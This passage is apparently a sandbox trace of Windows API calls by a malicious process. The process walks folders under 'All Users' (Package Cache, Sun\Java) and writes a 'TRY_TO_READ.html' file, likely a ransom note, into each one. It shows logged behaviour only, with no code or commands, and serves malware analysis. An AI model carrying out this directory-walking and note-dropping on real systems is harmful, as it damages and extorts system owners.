ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e658 [0161.454] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.455] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="42D5BEC7DDFBD49E76467529CBC2868987BF8460", cAlternateFileName="42D5BE~1")) returned 1 [0161.455] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.456] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", cAlternateFileName="54050A~1")) returned 1 [0161.456] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.459] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978f4db0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.460] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0161.460] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.461] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xecd314a0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0161.461] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.465] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", cAlternateFileName="{37B8F~1.610")) returned 1 [0161.465] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.467] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a127460, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", cAlternateFileName="{3C3AA~1")) returned 1 [0161.467] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.471] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", cAlternateFileName="{582EA~1.250")) returned 1 [0161.471] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.473] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", cAlternateFileName="{68306~1.250")) returned 1 [0161.473] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.475] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", cAlternateFileName="{8D4F7~1.250")) returned 1 [0161.475] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.478] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", cAlternateFileName="{929FB~1.210")) returned 1 [0161.479] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.480] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", cAlternateFileName="{A749D~1.210")) returned 1 [0161.480] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.482] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0161.482] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.484] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0161.484] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.485] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfaaff840, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", cAlternateFileName="{CA675~1")) returned 1 [0161.485] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.505] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", cAlternateFileName="{CF2BE~1.610")) returned 1 [0161.505] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.509] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", cAlternateFileName="{E5127~1.250")) returned 1 [0161.509] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.511] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa912d270, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{e52a6842-b0ac-476e-b48f-378a97a67346}", cAlternateFileName="{E52A6~1")) returned 1 [0161.511] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.531] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcad7040, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0161.531] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.552] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf93efac0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{f325f05b-f963-4640-a43b-c8a494cdda0f}", cAlternateFileName="{F325F~1")) returned 1 [0161.552] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.575] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0161.575] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0161.578] FindNextFileW (in: hFindFile=0x35e658, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0161.578] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Start Menu\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0xffffffff [0161.578] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Sun\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x9791af10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e698 [0161.578] FindNextFileW (in: hFindFile=0x35e698, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x9791af10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.578] FindNextFileW (in: hFindFile=0x35e698, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0161.578] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Sun\\Java\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\sun\\java\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e8 [0161.580] FindNextFileW (in: hFindFile=0x35e698, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9791af10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9791af10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 